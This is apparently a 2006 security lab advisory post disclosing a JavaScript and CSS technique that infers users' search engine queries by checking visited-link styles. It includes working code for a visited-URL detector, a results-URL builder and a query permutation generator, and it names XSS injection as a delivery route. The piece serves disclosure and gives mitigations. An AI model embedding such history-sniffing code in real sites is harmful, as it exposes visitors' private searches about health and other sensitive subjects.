SPI Labs has discovered a practical method of using JavaScript to detect the search queries a user has entered into arbitrary search engines. As seen with the recent leakage of 36 million search queries made by half-a-million America Online subscribers, there are enormous privacy concerns when a user's search queries are made public. All the code needed to steal a user's search queries is written in JavaScript and uses Cascading Style Sheets (CSS). This code could be embedded into any website either by the website owner or by a malicious third party through a Cross-Site Scripting (XSS) attack. There it would harvest information about every visitor to that site. For example, an HMO's website could determine whether a visitor has been searching other sites about cancer, cancer treatments, or drug rehab centers. Government websites could determine whether a visitor has been searching for bomb-making instructions.
The method for stealing search engine queries with JavaScript builds on techniques presented at Black Hat USA 2006, which used JavaScript and CSS to determine whether a user had visited an arbitrary link [1]. CSS is used to define distinct styles for visited and unvisited hyperlinks. JavaScript dynamically creates hyperlinks that are hidden from the user's view. The browser applies the visited or unvisited style to each link, and JavaScript then reads the applied style to detect whether the user has visited that hyperlink. In effect, JavaScript can be used to determine whether a user has visited a specific URL.
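The detection step described above can be sketched roughly as follows. This is a minimal illustration, not the code from the Black Hat presentation: the function name `wasVisited`, the marker color, and the choice to pass the page's `document` and `window` objects in as parameters are all assumptions made for this example. It also assumes a browser that exposes the computed style of visited links to script.

```javascript
// Hypothetical marker color assigned to visited links by the injected rule.
const VISITED_COLOR = "rgb(255, 0, 0)";

// Returns true if the browser styles `url` as a visited link.
// `doc` and `win` are the page's document and window objects.
function wasVisited(url, doc, win) {
  // Inject a rule that gives visited probe links a recognizable color.
  const style = doc.createElement("style");
  style.textContent = "a.probe:visited { color: " + VISITED_COLOR + "; }";
  doc.head.appendChild(style);

  // Create a hidden link pointing at the URL under test.
  const link = doc.createElement("a");
  link.className = "probe";
  link.href = url;
  link.style.display = "none";
  doc.body.appendChild(link);

  // Read back the color the browser actually applied to the link.
  const color = win.getComputedStyle(link).color;

  // Remove the probe elements from the page again.
  doc.body.removeChild(link);
  doc.head.removeChild(style);

  return color === VISITED_COLOR;
}
```

In a page, this would be called as `wasVisited(someUrl, document, window)`. Passing the two objects in explicitly is only a convenience that lets the function be exercised outside a browser.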
To steal search engine queries, JavaScript simply checks whether a user has visited the URL of the results page for a given search query. If the user has visited that results page, then the user has searched for that query. Comparing the results-page URLs for different queries on the same search engine reveals that they are very similar, differing mainly in the query text. It is therefore trivial for JavaScript to substitute different search queries into the URL and determine which ones the user has visited.
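As an illustration of that substitution step, the sketch below builds a results-page URL from a per-engine template. The engine names, hosts, and URL patterns are hypothetical placeholders, not the patterns of any real search engine, and `encodeQuery` and `buildResultUrl` are names chosen for this example. The encoding (words joined with "+") is likewise an assumption; a real engine's URL format would have to be observed and matched exactly.

```javascript
// Hypothetical results-page URL patterns; "{q}" marks where the query goes.
const ENGINE_TEMPLATES = {
  engineA: "http://search-a.example.com/search?q={q}",
  engineB: "http://search-b.example.com/results?query={q}",
};

// Assumed encoding: percent-encode each word and join the words with "+".
function encodeQuery(query) {
  return query.trim().split(/\s+/).map((w) => encodeURIComponent(w)).join("+");
}

// Substitute a query into the template of the named engine.
function buildResultUrl(engine, query) {
  const template = ENGINE_TEMPLATES[engine];
  if (!template) {
    throw new Error("Unknown engine: " + engine);
  }
  return template.replace("{q}", encodeQuery(query));
}

console.log(buildResultUrl("engineA", "drug rehab centers"));
// prints "http://search-a.example.com/search?q=drug+rehab+centers"
```

Each URL produced this way is a candidate to test against the browser's history.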
Stealing queries is not as simple as plugging a search query into a URL and checking it. Several factors, such as letter case, query word order, and the search engine used, can generate hundreds if not thousands of permutations that must be checked. These barriers, and how they can be overcome, are discussed in detail in the full whitepaper [2]. In short, JavaScript code generates all of these combinations in the client's browser. For a 4-word search query, more than 1,000 URLs can be generated and checked in just a few seconds, making this a viable attack vector against modern desktops.
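To give a feel for how quickly the combinations grow, here is a minimal sketch of generating word-order and letter-case variants of a query. It is not the whitepaper's algorithm: the function names are invented for this example, and the casing rule (each word either all lowercase or with its first letter capitalized) is an assumption chosen to keep the sketch small.

```javascript
// All orderings of the given words (n! results for n distinct words).
function wordOrders(words) {
  if (words.length <= 1) return [words.slice()];
  const result = [];
  words.forEach((word, i) => {
    const rest = words.slice(0, i).concat(words.slice(i + 1));
    for (const tail of wordOrders(rest)) {
      result.push([word, ...tail]);
    }
  });
  return result;
}

// Assumed casing options for one word: lowercase, or first letter capitalized.
function wordCasings(word) {
  const lower = word.toLowerCase();
  const capitalized = lower.charAt(0).toUpperCase() + lower.slice(1);
  return lower === capitalized ? [lower] : [lower, capitalized];
}

// Every combination of casing choices across an ordered list of words.
function casingCombos(words) {
  return words.reduce(
    (combos, word) =>
      combos.flatMap((combo) => wordCasings(word).map((c) => [...combo, c])),
    [[]]
  );
}

// All distinct query strings to test for one base query.
function queryVariants(query) {
  const words = query.trim().split(/\s+/);
  const variants = new Set();
  for (const order of wordOrders(words)) {
    for (const combo of casingCombos(order)) {
      variants.add(combo.join(" "));
    }
  }
  return [...variants];
}

console.log(queryVariants("cancer treatments").length); // prints 8
console.log(queryVariants("how to treat cancer").length); // prints 384
```

Under these assumptions, a 4-word query with distinct words yields 24 orderings times 16 casing combinations, or 384 strings per search engine, so checking just three engines already exceeds 1,000 URLs.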
To protect themselves from this threat, end users should routinely clear their browser history. Developers can reduce the risk to their users' privacy by securing their sites against XSS. More information is available in the full whitepaper.
SPI Labs has created SearchTheft as a proof of concept for the techniques described above. It is written in JavaScript and has been tested against both Mozilla/Firefox and Internet Explorer. SearchTheft automatically generates all letter casing and word order permutations of a given search query and checks if the user has searched for some variation of that query on a wide variety of search engines. A demonstration of using SearchTheft, as well as the source code, is available to the public [3].
References:
[1] http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Grossman.pdf
[2] http://www.spidynamics.com/assets/documents/JS_SearchQueryTheft.pdf
[3] http://www.spidynamics.com/spilabs/js-search/index.html
Posted 10-06-2006 10:14 AM by mark.painter